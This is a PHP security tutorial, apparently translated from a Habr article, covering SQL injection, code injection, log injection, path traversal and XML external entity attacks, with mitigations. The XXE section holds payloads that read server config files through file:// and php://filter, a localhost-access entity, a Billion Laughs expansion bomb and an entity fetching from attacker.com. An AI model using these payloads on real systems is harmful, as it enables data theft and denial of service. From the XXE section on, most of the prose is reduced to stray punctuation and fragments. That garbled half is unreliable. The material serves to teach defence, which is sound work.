The book "Security in PHP" (part 1)
In OWASP's list of the ten most common attack types, the first two places are held by injection attacks and XSS (cross-site scripting). They go hand in hand, because XSS, like a number of other attack types, depends on a successful injection. The name covers a whole class of attacks in which data is injected into a web application to force it to execute or interpret malicious code in the way the attacker wants. Such attacks include, for example, XSS, SQL injection, header injection, code injection, and Full Path Disclosure. And that is only a small part.
Injection attacks are every programmer's nightmare. They are the most common and the most successful, owing to their diversity, their scale and (sometimes) the difficulty of defending against them. Every application needs to take data from somewhere. XSS and UI Redress are especially common, so I have given them separate chapters and set them apart from the general class.
OWASP offers the following definition of injection attacks:
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
SQL injection is the most common and an extremely dangerous form of injection attack. It is hard to overstate the seriousness of this threat, so it is extremely important to understand what makes these attacks succeed and how to defend against them.
So, data is injected into a web application and then used in SQL queries. It usually arrives from untrusted input sources such as web forms. However, injection can also originate elsewhere, for example from the database itself. Programmers often trust their database completely, not realizing that data that was safe in one case is not necessarily safe in another. Data from the database should be treated as untrusted until proven otherwise, that is, until it has been validated.
If the attack succeeds, the attacker can manipulate the SQL query so that it performs database operations the developers never intended.
Look at this query:
$db = new mysqli('localhost', 'username', 'password', 'storedb');
// Vulnerable: untrusted POST data is concatenated straight into the SQL text.
$result = $db->query(
    'SELECT * FROM transactions WHERE user_id = ' . $_POST['user_id']
);
There are a number of flaws here. First, we did not validate the user_id value from the POST data. Second, we let an untrusted source tell us which user_id to use: an attacker can supply any valid user_id. It may have come from a hidden form field that we considered safe because it cannot be edited (forgetting that attackers can submit any data they like). Third, we neither escaped user_id nor passed it to the query as a bound parameter, which lets the attacker inject arbitrary strings that manipulate the SQL query, given that we failed to validate it in the first place.
These three omissions are very common in web applications.
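To make the third flaw concrete, here is a minimal sketch of what string concatenation does to the query text. The helper name buildUnsafeQuery() is hypothetical and exists only for illustration; it builds the query the same way as the example above, without touching a database.

```php
<?php
// Hypothetical helper: builds the query text the same unsafe way as above.
function buildUnsafeQuery(string $userId): string
{
    return 'SELECT * FROM transactions WHERE user_id = ' . $userId;
}

// What the developer expects to receive.
echo buildUnsafeQuery('42'), PHP_EOL;
// SELECT * FROM transactions WHERE user_id = 42

// What an attacker can send instead: the condition is now always true,
// so the query would return every user's transactions.
echo buildUnsafeQuery('42 OR 1=1'), PHP_EOL;
// SELECT * FROM transactions WHERE user_id = 42 OR 1=1
```

The attacker never needs to know the schema in advance; the input simply becomes part of the SQL grammar.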
On the subject of trusting the database, imagine that we looked up transactions using the user_name field. Names can take many forms and may contain quotes. Suppose an attacker stores an injection string in one of the user names. When we reuse that value in a later query, it will manipulate the query string, because we treated the database as a trusted source and neither escaped nor bound the compromised value.
Note another aspect of SQL injection: persistent storage does not always live on the server. HTML5 supports client-side databases that can be queried with SQL from JavaScript. There are two APIs for this: WebSQL and IndexedDB. In 2010 the W3C stopped recommending WebSQL; it is supported by WebKit browsers, which use SQLite as the backend. Support will most likely remain for backward compatibility despite the W3C's position. As its name implies, this API accepts SQL queries, which means it can be a target for injection attacks. IndexedDB is a newer alternative, a NoSQL database (it does not use SQL queries).
Manipulating SQL queries can have the following goals:
Defense against SQL injection follows the principle of defense in depth. Before data is used in a query, it must be validated to confirm it has the expected form. It must also be escaped before being included in the query, or be included as a bound parameter.
I never tire of repeating it: all data that was not explicitly created in the PHP source code of the current request is untrusted. Validate it strictly and reject anything that fails validation. Do not try to "fix" the data; only light, cosmetic changes to its format are acceptable.
Common mistakes include validating data only for its immediate use (for example, for display or calculation) while failing to validate it against the database fields in which it will eventually be stored.
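As an illustration of "validate strictly and reject", the following sketch checks a user id before it goes anywhere near a query. The function name validateUserId() and the rule "positive decimal integer" are assumptions made for this example; a real application would apply whatever rule matches its own column definition.

```php
<?php
/**
 * Returns the id as an int if it is a positive decimal integer that fits
 * in a PHP int, otherwise null. Name and rule are illustrative assumptions.
 */
function validateUserId($raw): ?int
{
    // Request values are strings; arrays (user_id[]=1) or other types are rejected.
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null; // reject, do not try to repair the value
    }
    // FILTER_VALIDATE_INT also rejects values that overflow an int.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}
```

A caller would typically stop processing and report an error when null comes back, rather than stripping the offending characters and carrying on.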
With the mysqli extension you can escape all data included in an SQL query. This is done with the mysqli_real_escape_string() function. The pgsql extension for PostgreSQL offers pg_escape_bytea(), pg_escape_identifier(), pg_escape_literal() and pg_escape_string(). The mssql extension (Microsoft SQL Server) has no escaping functions, and the addslashes() approach is ineffective, so you will need a custom function.
To make your life harder still, let me add that you cannot afford a single mistake when escaping the data that goes into a query. One slip and you are vulnerable to attack.
To sum up: escaping is not the best defense. Use it only as a last resort. It may be necessary if the database library you use for abstraction lets you build raw SQL queries or query fragments without enforcing parameter binding. Otherwise it is better to avoid escaping altogether. The approach is complicated, error-prone and differs from one database extension to another.
Parameterization, or parameter binding, is the recommended way to create SQL queries. All good database libraries use it by default. Here is an example of using the PDO extension for PHP:
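// $_POST values are strings, so is_int() would always fail; ctype_digit() is the check that matters.
if (isset($_POST['id']) && is_string($_POST['id']) && ctype_digit($_POST['id'])) {
    $validatedId = $_POST['id'];
    $pdo = new PDO('mysql:store.db');
    $stmt = $pdo->prepare('SELECT * FROM transactions WHERE user_id = :id');
    $stmt->bindParam(':id', $validatedId, PDO::PARAM_INT);
    $stmt->execute();
} else {
    // reject the id value and report an error to the user
}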
The bindParam() method, available on PDO statements, binds parameters to the placeholders in a previously prepared statement. It accepts the basic data types as parameters, for example PDO::PARAM_INT, PDO::PARAM_BOOL, PDO::PARAM_LOB and PDO::PARAM_STR. PDO::PARAM_STR is the default unless you specify otherwise, so remember to set the type for other values!
Unlike manual escaping, parameter binding (or whatever equivalent your database library uses) escapes the bound data automatically, so you do not have to remember which function to use. Consistent parameter binding is also far more reliable than trying to remember to escape everything by hand.
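The effect of binding can be observed end to end with a small self-contained sketch. It assumes an in-memory SQLite database (the pdo_sqlite extension) in place of the MySQL server used above, and the table contents, the user_name column and the findTransactions() helper are all made up for the illustration.

```php
<?php
// Assumption: in-memory SQLite (pdo_sqlite) stands in for the real database
// so that the sketch can run on its own.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE transactions (id INTEGER PRIMARY KEY, user_name TEXT, amount REAL)');
$pdo->exec("INSERT INTO transactions (user_name, amount) VALUES ('alice', 9.99), ('bob', 20.0)");

// Hypothetical lookup helper using a named placeholder.
function findTransactions(PDO $pdo, string $userName): array
{
    $stmt = $pdo->prepare('SELECT user_name, amount FROM transactions WHERE user_name = :name');
    // The value is sent separately from the SQL text, so it cannot change the query structure.
    $stmt->bindValue(':name', $userName, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$legit  = findTransactions($pdo, 'alice');            // matches alice's single row
$attack = findTransactions($pdo, "alice' OR '1'='1"); // compared as a literal name, matches nothing
```

bindValue() is used here instead of bindParam() only because the value is bound once and not by reference; either method keeps the data out of the SQL text.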
Limiting the damage of a successful SQL injection is as important as preventing it altogether. Once an attacker is able to execute SQL queries, they do so as a specific database user. By applying the principle of least privilege, you can ensure that every user has only the privileges that are absolutely necessary for its tasks.
If a user has broad privileges, an attacker can drop tables and change the privileges of other users, carrying out further SQL injections on their behalf. To prevent this, never access the database from a web application as root, an administrator, or any other highly privileged user.
Another application of the principle is to separate the roles of reading from and writing to the database. Create one user with write-only access and another with read-only access. If the attack targets the "reading" user, the attacker cannot modify or write data in the tables. Access can be restricted even more narrowly, further reducing the impact of successful SQL injection attacks.
Many web applications, especially open source ones, are designed to use a single database user, whose privileges are almost certainly never reviewed. So keep this in mind and do not run applications under an administrator account.
Code injection is any technique that lets an attacker add source code to a web application in such a way that it is interpreted and executed. This does not include injecting code into the client side, for example JavaScript; that is the domain of XSS attacks.
Source code can be injected directly from an untrusted input source, or the web application can be forced to load it from the local file system or from an external resource such as a URL. When code is injected by including an external source, this is usually called remote file inclusion (RFI), although RFI itself is always aimed at injecting code.
The main causes of code injection:
Pay special attention to the last point: in this case, untrusted users can upload arbitrary files to the server.
PHP offers many targets for code injection, so this type of attack is at the top of any programmer's watch list.
The most obvious targets for code injection are the include(), include_once(), require() and require_once() functions. If untrusted input can determine the path parameter passed to these functions, the attacker can remotely control which file is included. Note that the included file does not have to be a real PHP file; any file format capable of holding text will do (that is, almost anything).
The path parameter may also be vulnerable to directory traversal or remote file inclusion. Using ../ (dot-dot-slash) sequences in a path lets an attacker reach almost any file the PHP process has access to. These functions also accept a URL when allow_url_include is enabled; the setting is off by default in current PHP versions, but it is worth checking.
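One common way to keep untrusted input out of the path parameter is to let the request choose only a key in a fixed map. The sketch below assumes a hypothetical set of page names and file locations; none of them come from the original text.

```php
<?php
// Hypothetical page names mapped to fixed file paths.
// User input only selects a key and never becomes part of a path.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(string $requested): ?string
{
    // Anything not listed, including '../' sequences or URLs, is rejected.
    return PAGES[$requested] ?? null;
}

// Typical use (not executed here):
// $file = resolvePage($_GET['page'] ?? 'home');
// if ($file === null) { http_response_code(404); exit; }
// require $file;
```

Because the lookup is an exact match on the key, there is nothing for a traversal sequence or a URL scheme to act on.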
The PHP eval() function accepts a string of PHP code and executes it.
The PCRE (Perl-compatible regular expression) function preg_replace() allowed the e modifier (PREG_REPLACE_EVAL) in older PHP versions; the modifier was deprecated in PHP 5.5 and removed in PHP 7.0. With it, the replacement string is treated as PHP code after substitution. If that string contains untrusted input, the input can inject executable PHP code.
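The usual replacement for the e modifier is preg_replace_callback(), which passes each match to a fixed function as data. The sketch below is an assumed example (the [[word]] markup and the shout() helper are invented for it), not code from the original text.

```php
<?php
// Upper-cases every word wrapped in [[...]] inside untrusted text.
function shout(string $input): string
{
    return preg_replace_callback(
        '/\[\[(\w+)\]\]/',
        // The match arrives as plain data in $m; it is never evaluated as PHP code.
        static function (array $m): string {
            return strtoupper($m[1]);
        },
        $input
    );
}

echo shout('hello [[world]]'), PHP_EOL; // hello WORLD
```

Input such as [[phpinfo()]] does not match the \w+ pattern and is returned unchanged; even if it did match, the callback would only transform the text.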
Web applications, by definition, include the files needed to serve any request. By exploiting flaws in routing logic, dependency management, autoloading and other processes, manipulating the request path or its parameters can make the server include specific local files. Since the web application was not designed to handle such manipulation, the consequences can be unpredictable. For example, an application may unwittingly expose routes intended only for command-line use, or expose other classes whose constructors perform tasks (classes should not be designed this way, but it happens). Any of these scenarios can interfere with the application's backend operations, allowing data manipulation or a DoS attack against resource-intensive operations that were never meant to be directly accessible.
The range of objectives is extremely wide, since this type of attack allows an attacker to execute any PHP code of their choosing.
Many applications collect logs, and authorized users often view them through an HTML interface. Logs are therefore a prime target for attackers who want to disguise other attacks, deceive those who read the logs, or even attack the users of the monitoring application through which the logs are read and analyzed.
How vulnerable logs are depends on the mechanisms that control log writing, and on whether log data is treated as an untrusted source when records are viewed and analyzed.
A simple logging system might write lines of text to a file using file_put_contents(). For example, a programmer records failed login attempts as strings in the following format:
sprintf("Failed login attempt by %s", $username);
But what if the attacker submits the name "Admin\nSuccessful login by Admin\n" in the form?
If this string is written to the log from untrusted input, the attacker has disguised their failed login attempt as an innocent slip by the administrator when typing the password. The entry looks even less suspicious with a successful login attempt appended.
The whole point here is that the attacker is able to add arbitrary entries to the log. They can also inject an XSS vector, or even characters that make log entries hard to read in a console.
One target of injection is the log format interpreter. If the analysis tool uses regular expressions to parse log entries, splitting them into parts and assigning them to fields, then a string can be crafted and injected that makes the regular expressions pick up the injected fields instead of the correct ones. For example, this entry can cause several problems:
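$username = "iamnothacker! at Mon Jan 01 00:00:00 +1000 2009";
// The timestamp argument is missing in the source; date() here is an assumed stand-in.
sprintf("Failed login attempt by %s at %s", $username, date('D M d H:i:s O Y'));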
More sophisticated log injection attacks rely on directory traversal to display logs in the browser. Under the right conditions, injecting PHP code into a log message and opening the log file in the browser results in a successful code injection, neatly formatted and executed at the attacker's request. And once malicious PHP is executing on the server, all that is left is to rely on the effectiveness of defense in depth to reduce the damage.
The simplest defense is to filter all external log messages against a whitelist. Suppose you restrict the character set to digits, letters and spaces. Messages containing disallowed characters are treated as corrupted, and an entry about a potential log injection attempt is written to the log instead. This is an easy way to protect simple text logs when you cannot avoid including untrusted input in messages.
The second defense is to encode untrusted input with a scheme such as base64, which uses a limited character set while still letting you store arbitrary information as text.
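Both defenses can be combined in a few lines. This is a sketch under assumptions: the function name formatFailedLogin() and the exact wording of the flagged entry are invented for the example, and the whitelist is the letters, digits and spaces rule described above.

```php
<?php
// Builds one log line for a failed login without letting the username
// introduce new lines or markup into the log.
function formatFailedLogin(string $username): string
{
    // Whitelist: letters, digits and spaces only.
    if (preg_match('/\A[A-Za-z0-9 ]+\z/', $username) === 1) {
        return sprintf('Failed login attempt by %s', $username);
    }
    // Anything else is kept, but base64-encoded and flagged as suspicious.
    return sprintf(
        'Failed login attempt by [base64:%s] (possible log injection)',
        base64_encode($username)
    );
}

echo formatFailedLogin('Admin'), PHP_EOL;
echo formatFailedLogin("Admin\nSuccessful login by Admin\n"), PHP_EOL;
```

The encoded form can be decoded later by whoever investigates the entry, while the log file itself never contains the attacker's line breaks.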
Path traversal attacks are attempts to influence file read or write operations in the backend of a web application. They work by injecting parameters that manipulate the file paths involved in backend operations. Attacks of this type thus facilitate information disclosure and local or remote file injection.
We will look at those attacks separately, but path traversal is the basis of their success. Since the functions described below are typical targets for file path manipulation, it is worth mentioning that many PHP functions do not accept file paths in the usual sense of the word. Instead, functions such as include() or file() take a URI.
This looks quite unnatural, but it means that the following two function calls, which use absolute paths (that is, without relying on the resolution of relative paths), are equivalent.
include('/var/www/vendor/library/Class.php');
include('file:///var/www/vendor/library/Class.php');
The point is that relative paths are resolved elsewhere (via the include_path setting in php.ini and the available autoloaders). In such cases PHP functions are especially vulnerable to many forms of parameter manipulation, including File URI Scheme Substitution, where an attacker can inject an HTTP or FTP URI if untrusted data is inserted at the start of a file path. We will say more about this in the section on remote file inclusion attacks; for now, let's focus on file system path traversal.
This vulnerability involves altering a path so that it points to a different file. It is usually achieved by injecting a series of ../ sequences into an argument that is then appended to, or inserted whole into, functions such as include(), require(), file_get_contents() and even less suspicious (to some) functions like DOMDocument::load().
The ../ sequence forces the system to step back to the parent directory. So the path /var/www/public/../vendor actually leads to /var/www/vendor. The ../ sequence after /public takes us back to the parent directory, that is, to /var/www. In this way the attacker gains access to files outside the /public directory that the web server exposes.
Of course, path traversal is not limited to stepping back. New path elements can be injected to reach child directories that are not accessible from the browser because of restrictions in .htaccess. PHP file system operations take no notice of the web server's access control configuration for non-public files and directories.
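A frequently used check against traversal is to resolve the final path and confirm that it still lies under the intended base directory. The sketch below assumes a hypothetical helper named resolveInside(); it relies on realpath(), so it only works for files that already exist.

```php
<?php
/**
 * Resolves $userPath relative to $baseDir and returns the real path,
 * or null if the result does not exist or escapes $baseDir.
 * The helper name is an illustrative assumption.
 */
function resolveInside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $userPath);
    if ($base === false || $full === false) {
        return null;
    }
    // Compare against the base plus a trailing separator, so that
    // /var/www/public2 is not mistaken for something inside /var/www/public.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}
```

With a base of /var/www/public, a request for ../vendor resolves to /var/www/vendor, fails the prefix comparison and is rejected. Because realpath() also follows symbolic links, a link inside the base directory that points elsewhere is rejected as well.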
Despite the arrival of JSON as a lightweight data interchange format between server and client, XML remains a popular alternative, and web service APIs often support it alongside JSON. XML is also used for data exchange through XML-based formats such as RSS, Atom, SOAP and RDF.
XML is ubiquitous: it can be found in web application servers, in browsers (as the preferred format for XMLHttpRequest requests and responses) and in browser extensions. Given its prevalence and the fact that it is processed by default by a parser as popular as libxml2, which PHP uses in DOM and in the SimpleXML and XMLReader extensions, XML has become a target for injection attacks. When the browser takes an active part in the XML exchange, bear in mind that through XSS, authorized users may send XML requests that were actually crafted by attackers.
Such attacks are possible because XML parsing libraries often support references to custom entities. You are probably familiar with XML's standard set of entities, used to represent special markup characters such as &gt;, &lt; and &apos;. XML lets you extend the standard set by defining custom entities within the XML document itself. They can be defined directly in the optional DOCTYPE, and the expanded value they represent may refer to an external resource that is to be included. This ability of ordinary XML to pull in external resources is what makes XXE attacks possible.
For example, let's define a new custom entity named harmless:
<!DOCTYPE results [ <!ENTITY harmless "completely harmless"> ]>
An XML document with this definition can now refer to the &harmless; entity wherever entities are allowed:
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY harmless "completely harmless">]> <results> <result>This result is &harmless;</result> </results>
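When an XML parser such as PHP DOM interprets this XML, it processes the custom entity as the document is loaded. Requesting the corresponding text therefore returns: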
This result is completely harmless
, XML . , XML , . , , XML, . , :
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]> <results> <result>&harmless;</result> </results>
&harmless;
. XML- - . , . XML, , , . . XML, XML, , . PHP , , HTTP- -, .
PHP XML: PHP DOM, SimpleXML XMLReader. libxml2, . , PHP XXE-, - , XML.
, XHTML HTML 5 XML. , XHTML- XML- HTML 5 XML, DOMDocument::loadXML()
DOMDocument::loadHTML()
. XML- XML-. , libxml2 HTML 5 DOCTYPE, XHTML DOCTYPES.
, , XML- .
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]> <results> <result>&harmless;</result> </results>
&harmless;
. , , . , , . , : XML-, , XML-. , PHP:
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.ini" > ]> <results> <result>&harmless;</result> </results>
PHP URI, , : file_get_contents()
, require()
, require_once()
, file()
, copy()
. PHP , , . , , convert.base64-encode
.
, PHP , . , . , . , , .
. XXE- -, . . :
if (isset($_SERVER['HTTP_CLIENT_IP'])
    || isset($_SERVER['HTTP_X_FORWARDED_FOR'])
    || !in_array(@$_SERVER['REMOTE_ADDR'], array('127.0.0.1', '::1'))
) {
    header('HTTP/1.0 403 Forbidden');
    exit('You are not allowed to access this file.');
}
PHP, , PHP- , . . localhost. XXE- , , HTTP- XML- localhost.
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php" > ]> <results> <result>&harmless;</result> </results>
, . , .
DOS- , . XML- HTTP-, .
DOS- XXE- XML-.
, , . DOM, SimpleXML XMLReader libxml2, libxml_disable_entity_loader()
, . , , DOCTYPE, , HTTP- .
$oldValue = libxml_disable_entity_loader(true); $dom = new DOMDocument(); $dom->loadXML($xml); libxml_disable_entity_loader($oldValue);
, XML , URI.
, , . «» XML, , XXE-:
libxml_disable_entity_loader(true);
TRUE . , Docbook XML HTML, XSL- .
libxml2 — . PHP-, - XML, «» .
, , XML- DOCTYPE. , XML-, XML- . , — , . . , .
/**
 * Attempt a quickie detection
 */
// [[:space:]] is the POSIX class inside a bracket expression; the variable name is now consistent.
$collapsedXml = preg_replace('/[[:space:]]/', '', $xml);
if (preg_match('/<!DOCTYPE/i', $collapsedXml)) {
    throw new \InvalidArgumentException(
        'Invalid XML: Detected use of illegal DOCTYPE'
    );
}
, . -, ? , , (, ). , libxml_disable_entity_loader()
, , . XML- (XML Entity Expansion).
XML-. DOS- . DOCTYPE XML , , , XML- . . XML- HTML 5 , libxml2 HTML.
XML- .
— « ». . , , XML- XML.
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]> <results> <result>Now include &long; lots of times to expand the in-memory size of this XML structure</result> <result>&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; Keep it going... &long;&long;&long;&long;&long;&long;&long;...</result> </results>
, XML- , . , DOS-. : XML , .
XML, . (resolve) , . , XML- (Billion Laughs Attack).
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY x0 "BOOM!"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;"> <!-- Add the remaining sequence from x4...x100 (or boom) --> <!ENTITY x99 "&x98;&x98;"> <!ENTITY boom "&x99;&x99;"> ]> <results> <result>Explode in 3...2...1...&boom;</result> </results>
XML- XML, . , , 2^100 — &x0;
. !
XML DTD. , XML- HTTP-. XXE ( XML-), . , XXE, .
: XML- HTTP- . , , HTTP-. , - , , .
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY cascade SYSTEM "http://attacker.com/entity1.xml"> ]> <results> <result>3..2..1...&cascade;</result> </results>
DOS- : , . : (resolve) XML- . XXE-, DOS-.
, XXE-. (resolution) XML- , ; HTTP- , XML- PHP, libxml2.
libxml_disable_entity_loader(true);
PHP XML DTD DOCTYPE. PHP LIBXML_NOENT
, DOMDocument::$substituteEntities
, . , .
libxml2 , , . ; - , libxml2 .
, — XML- . , . , — XML, DOCTYPE. , DOCTYPE , . . HTTPS-. , PHP DTD. , libxml_disable_entity_loader(TRUE)
, , , (node value). .
$dom = new DOMDocument; $dom->loadXML($xml); foreach ($dom->childNodes as $child) { if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { throw new \InvalidArgumentException( 'Invalid XML: Detected use of illegal DOCTYPE' ); } }
, libxml_disable_entity_loader
TRUE, (resolve) XML. , XML- libxml2, .
SimpleXML, , simplexml_import_dom()
DOMDocument.
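The entity-loader switch and the DOCTYPE check shown earlier can be combined into one loading routine. The sketch below is an assumption-laden illustration: the function name loadUntrustedXml() is invented, and the version guard reflects the fact that libxml_disable_entity_loader() is deprecated as of PHP 8.0, where libxml 2.9.0 or later no longer substitutes entities by default.

```php
<?php
/**
 * Loads untrusted XML into a DOMDocument and rejects any document that
 * carries a DOCTYPE. The function name is an illustrative assumption.
 */
function loadUntrustedXml(string $xml): DOMDocument
{
    // Only call the deprecated switch on PHP versions older than 8.0.
    $previous = null;
    if (PHP_VERSION_ID < 80000) {
        $previous = libxml_disable_entity_loader(true);
    }

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing.
    $loaded = $dom->loadXML($xml, LIBXML_NONET);

    // Restore the earlier setting so other code is not affected.
    if ($previous !== null) {
        libxml_disable_entity_loader($previous);
    }
    if ($loaded === false) {
        throw new InvalidArgumentException('Invalid XML: document could not be parsed');
    }
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new InvalidArgumentException('Invalid XML: Detected use of illegal DOCTYPE');
        }
    }
    return $dom;
}
```

Rejecting every DOCTYPE is a deliberately blunt rule; an application that must accept documents with a DOCTYPE would need a narrower check.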
TBD
Source: https://habr.com/ru/post/352440/